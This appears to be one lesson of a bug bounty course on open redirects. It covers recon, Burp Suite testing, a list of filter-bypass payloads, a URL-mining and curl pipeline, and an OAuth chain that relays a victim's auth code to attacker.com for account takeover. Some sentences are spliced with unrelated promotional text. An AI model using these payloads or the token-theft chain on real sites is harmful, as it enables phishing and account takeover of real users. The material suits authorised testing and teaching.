Is open redirect a low severity vulnerability?

Standalone, yes. But open redirect is one of the most powerful chain vulnerabilities in bug bounty. Chained with OAuth it leads to account takeover. Combined with SSRF vectors it can reach internal infrastructure. The skill is recognising those chaining opportunities immediately upon confirmation.

Open Redirect Bug Bounty 2026 — Day 11 Complete Hunting Guide

Q: How much does open redirect pay in bug bounty?

Standalone open redirect pays $100-500 as Low severity. Chained with OAuth it becomes account takeover worth $5,000-30,000. The payout depends entirely on demonstrated impact — the same vulnerability earns 10-35x more when properly chained and documented.

Q: How does open redirect chain with OAuth for account takeover?

OAuth uses redirect_uri to send the access token after login. If that URI can point to the target domain open redirect endpoint, the token flows through the open redirect to the attacker. The attacker captures the auth code, exchanges it for an access token, and takes over the account — all without knowing the victim password.

DAY 11 OF 60

BUG BOUNTY MASTERY COURSE

FREE — ALL 60 DAYS

View Full Course →

🔴 Day 11 — Open Redirect Bug Bounty Hunting
Day 60 — Pro Hunter $$$$

← Day 10: SSRF Bug Bounty
Day 12: File Upload Vulnerabilities →

🔐 AUTHORISED TARGETS ONLY

All open redirect testing in this guide is performed on authorised targets only — DVWA, PortSwigger Academy free labs, TryHackMe, HackTheBox, or in-scope bug bounty programmes with explicit written permission. Never test redirect vulnerabilities on applications without authorisation. Never use open redirects for phishing attacks against real users — this course teaches responsible discovery and reporting only.

Here is a real scenario from HackerOne’s public disclosure feed. A researcher found a single URL parameter called ?redirect= on a major company’s login page. On its own, it paid $200. But that same researcher noticed the parameter appeared inside an OAuth flow. They chained the two vulnerabilities together. The open redirect became a full account takeover. Final payout: $7,500. Same vulnerability. Completely different impact. The difference was knowing how to chain. Today — Day 11 — you learn open redirect bug bounty hunting from zero to the advanced chaining techniques that multiply your payouts.

🎯

After reading Day 11, you will be able to:

Explain open redirect using a simple real-world analogy · Find every redirect parameter on a target in under 5 minutes · Confirm open redirect with Burp Suite Repeater · Apply 6 filter bypass techniques when basic payloads are blocked · Chain open redirect with OAuth for account takeover impact · Write a report that earns maximum payout for this vulnerability class

~22

min read

📊 QUICK POLL — Day 11

How familiar are you with open redirect vulnerabilities going into today?

📋 What You Will Master in Day 11

🟢 What Is Open Redirect?
🟢 Why Open Redirect Pays — Standalone vs Chained Payout Difference
🟡 Finding Every Redirect Parameter — The Complete Recon Method
🟡 Manual Testing with Burp Suite — Step by Step Confirmation
🟡 6 Filter Bypass Techniques When Basic Payloads Are Blocked
🔴 Automating Open Redirect Discovery at Scale
🔴 Chaining Open Redirect with OAuth — The $7,500 Account Takeover
🔴 Writing Reports That Pay Maximum — With Full Template
📋 Commands Used Today — Complete Reference Card

What Is Open Redirect?

Imagine you are visiting a city you have never been to before. You need to get to the central library. Someone on the street who looks official points you to a sign that says “Central Library — this way →”. You trust the sign because it is in the right city, on an official-looking post, right outside the town hall. You follow it. But the sign was placed by someone else. It leads you to a completely different building — a fake library that steals your wallet when you walk in.

An open redirect vulnerability works exactly like that fake sign. It exists in web applications that accept a user-controlled URL in a redirect parameter and send users to that URL without checking whether it is a trusted destination. A link that appears to belong to a trusted website — bank.com/login?redirect=… — can actually send the user anywhere on the internet. Because the link starts with bank.com, most people trust it completely.

This is why open redirect bug bounty hunting matters so much. Companies that have this vulnerability on their login pages and payment flows are unknowingly providing attackers with legitimate-looking infrastructure for phishing. Every email with a real company domain in the URL bypasses spam filters and user suspicion. Understanding this impact is what separates a $150 report from a $7,500 one.

securityelites.com

OPEN REDIRECT — HOW IT LOOKS IN THE WILD

✅ NORMAL BEHAVIOUR — redirects to internal page

GET /login?redirect=/dashboard HTTP/1.1
Host: bank.com

Response: 302 Location: https://bank.com/dashboard ✅

❌ OPEN REDIRECT — attacker controls destination

GET /login?redirect=https://evil.com/fake-bank HTTP/1.1
Host: bank.com

Response: 302 Location: https://evil.com/fake-bank ❌
User lands on phishing page — link showed bank.com in email

📧 WHY THIS BYPASSES EVERY SPAM FILTER

Link in phishing email: https://bank.com/login?redirect=https://evil.com/fake-bank
Spam filter sees: bank.com domain → trusted → delivered to inbox
User sees: bank.com in the link → clicks without suspicion
Reality: redirected to attacker site after login attempt ❌

Open Redirect in the Wild — the difference between intended redirect behaviour and an exploitable open redirect. The key is that the URL in any phishing email starts with the legitimate domain, bypassing both technical spam filters and human suspicion. This is the core impact that drives bug bounty payouts for this vulnerability class.

💡 KEY INSIGHT — Why It Exists in the First Place

Redirect parameters serve a completely legitimate purpose. When you try to access a protected page without being logged in, the app saves your destination, sends you to login, then redirects you back after. This is good UX. The vulnerability arises when the developer accepts any URL without checking it belongs to their domain. One missing validation — and every link on their entire platform becomes a potential phishing vector for attackers.

🛠️ Exercise 1 — Spot Open Redirect Parameters on Real Websites (No Testing)

⏱️ 5 minutes · Browser only · Observation only — do NOT send payloads to live sites you don’t own

This exercise trains your eye to recognise redirect parameters automatically — the same pattern recognition professional hunters use on every new target.

Step 1: Open your browser and visit a few websites you use regularly (e-commerce, news sites, social platforms)

Step 2: Log out if you are logged in, then click any protected link to trigger a login redirect

Step 3: Look at the URL bar on the login page — do you see any of these?
?redirect= ?return= ?next= ?dest= ?url= ?goto= ?callback= ?returnUrl=
Step 4: Write down every redirect parameter name you find across 5 different websites. This becomes your personal redirect wordlist.

✅ What you just learned: You trained the fundamental recon skill of open redirect hunting — recognising redirect parameters on sight. Professional hunters do this automatically on every website they use. Your personal wordlist is a real reusable asset for future automated discovery.

Why Open Redirect Pays — The Standalone vs Chained Payout Difference

Here is the honest truth about open redirect payouts that most guides skip. A standalone open redirect — reported with no demonstrated impact beyond “it redirects to evil.com” — typically pays between $100 and $500. Many programmes rate it Low severity. Some won’t pay at all for it.

So why are we covering it on Day 11? Because open redirect is one of the most powerful chain vulnerabilities in bug bounty. On its own it is a $200 bug. Chained with the right co-existing vulnerability it becomes a $5,000–$30,000 Critical finding. The skill that multiplies payouts is not finding the redirect — it is recognising what else on the application can be combined with it.

securityelites.com

OPEN REDIRECT — PAYOUT GUIDE 2026

STANDALONE

$100–$500

Low/Info. No chain impact.

+ PHISHING DEMO

$500–$2K

Medium. Credible phishing vector on high-traffic endpoint.

+ SSRF CHAIN

$2K–$8K

High. Redirect reaches internal infrastructure via server fetch.

+ OAUTH → ATO

$5K–$30K

Critical. Redirect in OAuth leaks tokens → account takeover.

REAL 2026 PAYOUTS — HACKERONE PUBLIC DISCLOSURES

🟢 Shopify — Redirect on checkout: $500

🟡 Twitter/X — Redirect in OAuth flow: $4,200

🔴 Uber — Redirect → account takeover: $7,500

🟣 HackerOne — Redirect → token leak: $3,000

Open Redirect Payout Guide 2026. Standalone pays modestly. The same vulnerability chained with OAuth token flows upgrades to Critical account takeover territory. The skill that transforms a $200 finding into $7,500 is chain recognition — exactly what the advanced sections of today’s guide teach.

Finding Every Redirect Parameter on a Target — The Complete Recon Methodology

Before you can test for open redirect you need to find every place the application handles URL redirects. Redirect parameters hide in four locations: URL query strings, POST request bodies, HTTP headers, and JavaScript code that builds redirect URLs client-side. Your Burp Suite HTTP History captures the first three automatically as you browse normally.

securityelites.com

REDIRECT PARAMETER MAP — WHERE TO LOOK ON EVERY TARGET

🔢 URL QUERY PARAMETERS

?redirect=
?return=
?returnUrl=
?next=
?dest=
?destination=
?url=
?goto=
?target=
?forward=
?callback=
?r= / ?u= / ?go=

📬 POST BODY / JSON

redirect_url=
return_to=
success_url=
cancel_url=
after_login=
post_login_url=
{“redirect”: “…”}
{“returnUrl”: “…”}

🌐 HTTP HEADERS

Referer:
X-Forward-URL:
X-Redirect-URL:
X-Original-URL:
X-Continue-URL:

Header-based redirects are rarest but highest impact when found

HIGH-VALUE LOCATIONS — TEST THESE FIRST

🔴 Login page redirect parameters

🔴 OAuth / SSO redirect_uri parameters

🟡 Email confirmation link parameters

🟡 Password reset link parameters

🟡 Payment success/cancel URL parameters

🟢 Logout page redirect parameters

Redirect Parameter Map — three categories of input to systematically enumerate. The red priority targets (login page, OAuth redirect_uri) sit inside authentication flows where token theft is possible. Amber targets (email confirmation, password reset) appear in trusted emails. Always enumerate all four input types before moving to testing.

🛠️ Exercise 2 — Find All Redirect Parameters Using Burp Suite (Free Lab)

⏱️ 15 minutes · Free · PortSwigger Academy · Burp Suite Community Edition

Step 1: Go to PortSwigger Open Redirect Lab (free, no account needed)

Step 2: Open Burp Suite Community → Proxy → Intercept ON. Configure browser to use Burp as proxy.

Step 3: Browse the lab application normally — click every link, submit every form.

Step 4: In Burp → HTTP History → use the search filter to find all requests containing: redirect OR return OR url=

Step 5: For each match — right-click → Send to Repeater. You now have all redirect parameters ready for testing.

✅ What you just learned: You performed systematic redirect parameter discovery using Burp HTTP History filtering — the exact methodology professional hunters use on every new target. The filter trick reduces 200+ captured requests down to the 3-5 that actually contain redirect parameters worth testing.

Manual Testing with Burp Suite — Confirming Open Redirect Step by Step

Once you have redirect parameters identified, manual testing in Burp Suite Repeater is the fastest path to confirmation. This process takes under 2 minutes per parameter once you know it — and it is manual confirmation that programmes want to see in your report, not automated scanner output.

securityelites.com

BURP SUITE REPEATER — OPEN REDIRECT TESTING WORKFLOW

STEP 1 — BASELINE REQUEST

GET /login?redirect=/dashboard HTTP/1.1
Host: target.com

Response: 302 Location: https://target.com/dashboard ← normal

STEP 2 — INJECT YOUR CONTROLLED DOMAIN

GET /login?redirect=https://YOUR-TEST-DOMAIN.com HTTP/1.1
Host: target.com

→ 302 Location: https://YOUR-TEST-DOMAIN.com = CONFIRMED ✅
→ 302 Location: https://target.com/dashboard = VALIDATED — try bypass

STEP 3 — BROWSER VERIFICATION (Screenshot for Report)

Navigate to: https://target.com/login?redirect=https://YOUR-TEST-DOMAIN.com
Complete login → observe browser landing on YOUR-TEST-DOMAIN.com

Screenshot this: request → 302 response → final browser destination
This is your proof of impact for the bug bounty report

PRO TIP — USE YOUR OWN DOMAIN, NOT EVIL.COM

Professional hunters use their own controlled domain for redirect confirmation. Register a cheap domain or use a Burp Collaborator URL. Using evil.com in a report looks amateurish. Using yourname-securitytest.com looks professional and proves you own the destination.

Burp Suite Repeater — Open Redirect Testing Workflow. Three steps: (1) baseline to confirm normal behaviour, (2) inject your controlled domain and observe the Location header, (3) verify in browser and screenshot the full chain. The HTTP request, 302 response showing your domain in Location, and browser landing on your page is the complete evidence package for a valid report.

⚡ SECTION QUIZ — Day 11 Part 1

You inject ?redirect=https://your-domain.com and the server returns 302 Location: https://target.com/dashboard. What does this mean?

6 Filter Bypass Techniques — When the Basic Payload Gets Blocked

Most modern applications have some form of redirect validation. They check the URL starts with their own domain, or that it does not contain certain characters. These filters are often implemented quickly under deadline pressure — and quickly means imperfectly. Here are the six bypass techniques that work against the most common filter implementations.

securityelites.com

6 OPEN REDIRECT FILTER BYPASS TECHNIQUES — COMPLETE REFERENCE

BYPASS 1 — Protocol-Relative URL (Most Effective Against Basic Filters)

?redirect=//evil.com
?redirect=//evil.com/phishing-page
# Filter checks for "https://" and does not see it — allows through
# Browser interprets //evil.com as https://evil.com automatically

BYPASS 2 — URL Encoding

?redirect=%2F%2Fevil.com         # // encoded
?redirect=https%3A%2F%2Fevil.com # full https:// encoded
?redirect=https:%2F%2Fevil.com   # only slashes encoded
# Server decodes before rendering — external redirect happens

BYPASS 3 — Subdomain / Domain Trust Trick

?redirect=https://evil.com.target.com   # evil.com is the domain
?redirect=https://target.com.evil.com   # target.com is a subdomain
?redirect=https://evil.com/target.com   # target.com is a path
# Weak filter: endsWith("target.com") check — string ends with it → approved

BYPASS 4 — Fragment / Hash Trick

?redirect=https://target.com#https://evil.com
?redirect=https://target.com%23https://evil.com
# Works when JS reads window.location.hash and redirects based on it

BYPASS 5 — Backslash / Mixed Slash

?redirect=https:\evil.com
?redirect=https:\/\/evil.com
?redirect=///evil.com
# Filter checks for "https://" — backslash variant passes
# Browser normalises \ to // and redirects to evil.com

BYPASS 6 — Null Byte / Whitespace Injection

?redirect=https://target.com%00https://evil.com
?redirect=https://target.com%0ahttps://evil.com  # newline
?redirect=https://target.com%09https://evil.com  # tab
# Most effective against older PHP or CGI applications

6 Open Redirect Filter Bypass Techniques. Bypass 1 (protocol-relative) works against the majority of filters. Bypass 3 (subdomain trick) specifically targets simple string contains() checks. Try all six in sequence before concluding a parameter is not vulnerable — most applications are only hardened against the most basic https://evil.com payload.

💡 PRO TIP — Use Burp Intruder to Test All 6 Bypasses Simultaneously

Load all 6 bypass variants as a payload list in Burp Suite Intruder. Set the redirect parameter value as the injection point. Add a Grep Match rule to flag any response containing your controlled domain in the Location header. Run the attack — any flagged response is a confirmed bypass. This converts 6 manual tests into one automated sweep taking under 30 seconds.

Automating Open Redirect Discovery at Scale — Tools and Workflow

When running recon across large programmes with hundreds of subdomains, automation dramatically multiplies your coverage. The pipeline below combines three free tools to collect, filter, and test every historical redirect parameter on a target’s entire URL footprint — automatically.

securityelites.com

OPEN REDIRECT AUTOMATION PIPELINE — PROFESSIONAL WORKFLOW

STEP 1 — COLLECT ALL URLS (Waybackurls + Gau)

# Mine web archives for all historical URLs
echo "target.com" | waybackurls > all_urls.txt
echo "target.com" | gau >> all_urls.txt

# Filter for redirect parameters only
grep -iE "redirect|return|url=|next=|dest=|callback" all_urls.txt > redirect_params.txt

wc -l redirect_params.txt  # Typical output: 200-2000 endpoints

STEP 2 — AUTOMATED TESTING (qsreplace + curl)

# qsreplace replaces ALL parameter values with your payload
cat redirect_params.txt | \
  qsreplace "https://YOUR-DOMAIN.com" | \
  while read url; do
    r=$(curl -s -o /dev/null -w "%{redirect_url}" -L "$url")
    if echo "$r" | grep -q "YOUR-DOMAIN.com"; then
      echo "OPEN REDIRECT FOUND: $url"
    fi
  done

# Any output line = confirmed open redirect requiring manual verification

Open Redirect Automation Pipeline — Waybackurls and Gau collect all historical URLs, grep filters to redirect candidates, qsreplace injects your domain into every parameter value, curl follows the redirect and checks the destination. Confirmed findings require manual Burp Suite verification before reporting. Only run this pipeline on targets where you have explicit written authorisation.

🛠️ Exercise 3 — Run the Full Automation Pipeline on a Safe Test Target

⏱️ 20 minutes · Kali Linux terminal · Free tools · Authorised target only

Step 1: Install tools (Kali Linux or any Linux):

go install github.com/tomnomnom/waybackurls@latest

go install github.com/lc/gau/v2/cmd/gau@latest

go install github.com/tomnomnom/qsreplace@latest

Step 2: Run the pipeline against a bug bounty programme’s in-scope domain that permits automated scanning (always check programme rules first):

echo "target.com" | waybackurls | grep -iE "redirect|return|url=" | qsreplace "https://your-domain.com" | while read u; do r=$(curl -sk -o /dev/null -w "%{redirect_url}" -L "$u"); echo "$r" | grep -q "your-domain.com" && echo "FOUND: $u"; done

Step 3: For any FOUND result — open it in Burp Suite Repeater and manually verify before reporting.

No live target? Practice on DVWA or HackTheBox retired machines only.

✅ What you just learned: You built and ran the same automated open redirect discovery pipeline used by professional bug bounty hunters working large programmes. The pipeline scales — the same commands work whether a target has 10 URLs or 100,000.

Chaining Open Redirect with OAuth — The $7,500 Account Takeover Upgrade

This chain transforms a $200 Low-severity finding into a $7,500 Critical account takeover. Understanding it is one of the most valuable skills in bug bounty — and fewer than 5% of hunters who find open redirects ever attempt it.

OAuth is the technology behind “Login with Google” and “Login with Facebook.” When you click that, the website sends you to Google, Google verifies who you are, then sends your access token back. The destination for that token is specified in a parameter called redirect_uri. If the application has an open redirect anywhere on its domain — that redirect endpoint can be weaponised to steal the token.

securityelites.com

OPEN REDIRECT → OAUTH → ACCOUNT TAKEOVER — FULL CHAIN

Attacker confirms open redirect on target.com

https://target.com/login?redirect=//attacker.com
After login → redirects to attacker.com ✅ Confirmed

Attacker crafts malicious OAuth URL

https://accounts.google.com/oauth?client_id=TARGET_APP&
redirect_uri=https://target.com/login%3Fredirect%3D//attacker.com
# redirect_uri points to target.com open redirect endpoint

Victim clicks link, completes Google login

Victim sees legitimate Google login page — everything looks real. They log in as normal. Google validates their identity and prepares to send the auth code back.

Google sends auth code to redirect_uri

Google: 302 → https://target.com/login?redirect=//attacker.com
                         ?code=VICTIM_AUTH_TOKEN_HERE
target.com: 302 → https://attacker.com?code=VICTIM_AUTH_TOKEN_HERE

Attacker has victim’s auth token → full account access

Attacker receives auth code on their server. Exchanges it for an access token. Logs into target.com as the victim. Complete account takeover — no password ever needed. CVSS 9.0 Critical. Payout: $5,000–$30,000.

Open Redirect → OAuth → Account Takeover. The open redirect acts as a relay: OAuth sends the auth code to target.com (which is allowed), then target.com bounces it to the attacker via the open redirect. The victim only ever sees a legitimate Google login page. Only ever test this chain using your own test accounts — never on real users.

⚡ SECTION QUIZ — Day 11 Part 2

You find an open redirect on target.com’s login page. The app also supports Google OAuth login. What is the correct next step to maximise payout?

Writing Open Redirect Reports That Pay Maximum — Full Template

The difference between a $200 and a $7,500 payout on the same open redirect. This same escalation principle applies across the authentication vulnerability family — a standalone authentication bypass earns more when its impact on a specific privileged system is properly documented. The report structure in both cases is identical: standalone finding versus demonstrated chain. comes down entirely to how the report communicates impact. Triage teams are not paid to work out the chain for you — your job is to spell out every step so clearly that the reviewer can confirm it in under 5 minutes. Here is the template that consistently earns maximum payout for this vulnerability class.

securityelites.com

OPEN REDIRECT REPORT TEMPLATE — CHAINED CRITICAL FINDING

TITLE

[Open Redirect → OAuth Account Takeover] Open redirect on /login?redirect= allows OAuth auth code theft via attacker-controlled redirect_uri — full account takeover without victim credentials

SUMMARY

The redirect parameter on target.com/login accepts arbitrary external URLs. Combined with Google OAuth, an attacker can craft a malicious OAuth URL that routes the victim’s authentication code through the open redirect to an attacker-controlled server — achieving full account takeover without knowing the victim’s credentials.

STEPS TO REPRODUCE

1. Confirm open redirect: navigate to https://target.com/login?redirect=//attacker.com → after login completes, browser lands on attacker.com ✅

2. Start listener on attacker.com to capture incoming requests

3. Craft malicious OAuth URL:
https://accounts.google.com/oauth?client_id=TARGET_APP&redirect_uri=https://target.com/login%3Fredirect%3D//attacker.com&response_type=code&scope=email
4. As victim test account: navigate to malicious URL, complete Google login

5. Observe attacker.com server log — auth code received:
GET /?code=4/VICTIM_OAUTH_CODE HTTP/1.1
6. Exchange code for access token → authenticate to target.com as victim account ✅

IMPACT

→ Full account takeover — attacker logs in as any victim who clicks the malicious link
→ No credentials required — attack bypasses all password strength and MFA on the application
→ Exploitable via phishing email — link starts with target.com, bypasses spam filters
→ Affects all users who authenticate via Google OAuth

CVSS 3.1: 9.0 CRITICAL CWE-601: URL Redirection to Untrusted Site

REMEDIATION

Implement strict allowlist validation on the redirect parameter — accept only relative paths or explicitly allowlisted absolute URLs belonging to your domain. For OAuth, implement a strict redirect_uri allowlist at the OAuth application registration level so only exact registered URIs are accepted.

Open Redirect Chain Report Template. The critical elements: (1) title explicitly names the chain type, (2) reproduction steps work first try for any reviewer, (3) impact spells out who is affected and how, (4) CVSS 9.0 Critical with CWE reference signals professional quality. Compared to a standalone open redirect report, this structure earns 10–35x more payout on most programmes.

⚡ FINAL QUIZ — Day 11

A programme marks your open redirect report as “Informative — below our severity threshold” even though it is on a confirmed in-scope endpoint. What is the best next action?

Commands Used Today — Day 11 Complete Reference Card

📋 COMMANDS USED TODAY — DAY 11

Open Redirect Bug Bounty — Complete Reference

# ── RECON ────────────────────────────────────────────────────────
echo "target.com" | waybackurls | grep -iE "redirect|return|url=|next=|dest=" > redirects.txt
echo "target.com" | gau | grep -iE "redirect|return|url=|next=|dest=" >> redirects.txt

# ── BYPASS PAYLOADS ──────────────────────────────────────────────
//evil.com                         # Protocol-relative
%2F%2Fevil.com                    # URL encoded
https://evil.com.target.com       # Subdomain trick
https://target.com#https://evil.com # Fragment
https:\evil.com                   # Backslash
https://target.com%00evil.com     # Null byte

# ── AUTOMATED PIPELINE ───────────────────────────────────────────
cat redirects.txt | qsreplace "https://YOUR-DOMAIN.com" | \
  while read url; do
    r=$(curl -s -o /dev/null -w "%{redirect_url}" -L "$url")
    echo "$r" | grep -q "YOUR-DOMAIN.com" && echo "FOUND: $url"
  done

# ── OAUTH CHAIN PAYLOAD ──────────────────────────────────────────
https://accounts.google.com/oauth?client_id=TARGET_APP&
redirect_uri=https://target.com/login%3Fredirect%3D//attacker.com
&response_type=code&scope=email

# ── BURP SUITE FILTER ────────────────────────────────────────────
HTTP History search: redirect OR returnUrl OR callback OR next= OR dest=
Intruder Grep Match: Location: https://YOUR-DOMAIN.com

Share on Twitter/X and Discord — tag @SecurityElites 🔴

🔴

Day 11 Done. Open redirect found, bypassed, chained and reported.

Day 12 covers File Upload Vulnerabilities — from basic extension bypass to remote code execution through a “secure” upload form. The methodology that turns an image upload field into a critical server compromise.

Day 12: File Upload Vulnerabilities →

Finished Day 11? Lock in your progress.

← Day 10: SSRF Bug Bounty

60-DAY BUG BOUNTY MASTERY — DAY 11

11 of 60 days complete

Day 12: File Upload →

Frequently Asked Questions — Day 11

What is an open redirect vulnerability?

An open redirect is when a web application accepts a user-controlled URL in a redirect parameter and sends the user there without validating it is a trusted destination. Attackers craft links starting with a legitimate domain that redirect victims to malicious sites — bypassing spam filters and user suspicion because the URL looks real.

How much does open redirect pay in bug bounty?

Standalone: $100–$500 Low severity. Chained with OAuth it becomes account takeover worth $5,000–$30,000 Critical. The same vulnerability that earns $200 standalone earns $7,500 with a demonstrated chain. The payout depends entirely on impact, not the vulnerability type alone.

How do you bypass open redirect filters?

Six main techniques: protocol-relative URL (//evil.com), URL encoding (%2F%2Fevil.com), subdomain tricks (evil.com.target.com), fragment bypass (target.com#evil.com), backslash variants (https:\evil.com), and null byte injection (target.com%00evil.com). Try all six before concluding a parameter is not vulnerable.

What parameters should I test for open redirect?

Most common: redirect, return, returnUrl, next, dest, destination, url, goto, target, forward, callback, r, u, go, redir, redirect_uri, continue. Also check POST body JSON keys and HTTP headers like X-Forward-URL and X-Redirect-URL.

How does open redirect chain with OAuth for account takeover?

OAuth uses redirect_uri to send the auth code after login. This token theft mechanism is directly related to the broader class of session hijacking attacks covered in our 2026 browser security guide — AITM proxies steal session cookies the same way an OAuth chain steals auth codes. Different method, identical outcome: an authenticated session in the attacker’s hands. If that URI can point to the target domain’s open redirect, the auth code flows through the open redirect to the attacker. The attacker exchanges it for an access token and takes over the account — no password needed. Only ever demonstrate this chain using your own test accounts.

Is open redirect really worth hunting in bug bounty?

Absolutely — with the chain mindset. Standalone open redirects are low-value but high-frequency findings that train your parameter recognition skills. Every open redirect you find is a potential OAuth chain, SSRF chain, or phishing vector. The hunters who earn the most from open redirects are not finding more of them — they are recognising the chain potential faster than anyone else.

📚 Further Reading & Resources

SecurityElites — 60-Day Bug Bounty Course Hub — all 60 days free — Day 12 next: File Upload Vulnerabilities
SecurityElites — Day 10: SSRF Bug Bounty — how open redirect chains into SSRF for internal network access
SecurityElites — Day 7: XSS Bug Bounty — how XSS steals session cookies — the same outcome as an OAuth open redirect chain
SecurityElites — How to Write a Bug Bounty Report That Gets Paid 2026 — full report-writing guide with templates for every vulnerability class
PortSwigger Web Security Academy — OAuth Vulnerabilities — free interactive labs for the full OAuth chain technique →
OWASP WSTG — Client-side URL Redirect Testing — official methodology reference for open redirect assessment →

Mr Elite

Founder, SecurityElites.com | Bug Bounty Hunter | Educator

The first time I found an open redirect I reported it as a standalone finding and got $150. The second time I found the exact same vulnerability type — different target — I spent an extra hour testing the OAuth flow. Same underlying bug. Same redirect parameter. The chain paid $6,200. That one extra hour was worth $6,050. Open redirect is not a small bug. It is a door. Your job is to find out what is on the other side of it.

Day 11: Open Redirect Bug Bounty Hunting 2026 — Find, Chain and Report the Vulnerability That Turns $200 Bugs Into $5,000 Findings

What Is Open Redirect?

Why Open Redirect Pays — The Standalone vs Chained Payout Difference

Finding Every Redirect Parameter on a Target — The Complete Recon Methodology

Manual Testing with Burp Suite — Confirming Open Redirect Step by Step

6 Filter Bypass Techniques — When the Basic Payload Gets Blocked

Automating Open Redirect Discovery at Scale — Tools and Workflow

Chaining Open Redirect with OAuth — The $7,500 Account Takeover Upgrade

Writing Open Redirect Reports That Pay Maximum — Full Template

Commands Used Today — Day 11 Complete Reference Card

Frequently Asked Questions — Day 11

Leave a Comment Cancel reply